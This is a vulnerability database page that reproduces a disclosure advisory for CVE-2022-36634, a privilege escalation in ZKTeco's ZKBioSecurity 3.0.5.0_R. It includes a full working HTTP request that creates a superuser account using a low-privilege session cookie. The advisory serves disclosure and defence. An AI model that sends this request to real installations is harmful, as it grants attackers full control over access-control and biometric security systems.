Vulners
Lucene search
ZKSecurity BIO 3.0.5.0_R Privilege Escalation
🗓️ 01 Oct 2022 00:00:00Reported by Silton Santos, Caio BurgardtType 
packetstorm🔗 packetstormsecurity.com👁 201 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | ZKSecurity BIO 3.0.5.0_R Privilege Escalation Vulnerability | 3 Oct 202200:00 | – | zdt |
 | CVE-2022-36634 | 7 Oct 202220:15 | – | attackerkb |
 | CVE-2022-36634 | 8 Oct 202200:17 | – | circl |
 | ZKTeco ZKBioSecurity 安全漏洞 | 1 Oct 202200:00 | – | cnnvd |
 | ZKTeco ZKBioSecurity Access Control Error Vulnerability | 11 Oct 202200:00 | – | cnvd |
 | CVE-2022-36634 | 7 Oct 202200:00 | – | cve |
 | CVE-2022-36634 | 7 Oct 202200:00 | – | cvelist |
 | EUVD-2022-39337 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-36634 | 7 Oct 202220:15 | – | nvd |
 | Cross site request forgery (csrf) | 7 Oct 202220:15 | – | prion |
10
`#######################ADVISORY INFORMATION#######################
Product: ZKSecurity BIO
Vendor: ZKTeco
Version Affected: 3.0.5.0_R
CVE: CVE-2022-36634
Vulnerability: User privilege escalation
#######################CREDIT#######################
This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.
#######################INTRODUCTION#######################
Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.
#######################VULNERABILITY DETAILS#######################
The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application
#######################PROOF OF CONCEPT#######################
POST /authUserAction!edit.action HTTP/1.1
Host: {HOST}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347
Content-Length: 1956
Origin: http://{HOST}:8088
Connection: close
Referer: http://{HOST}:8088/base_index.action
Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>
Upgrade-Insecure-Requests: 1
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.username"
test_privesc
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.loginPwd"
KDla123
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="repassword"
KDla123
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.isActive"
true
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.isSuperuser"
true
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="groupIds"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="deptIds"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="areaIds"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.email"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.name"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="authUser.lastName"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="fingerTemplate"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="fingerId"
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="logMethod"
add
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="un"
1657813612925_286
-----------------------------291763244192371568695079347
Content-Disposition: form-data; name="systemCode"
base
-----------------------------291763244192371568695079347--
#######################END#######################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Oct 2022 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00529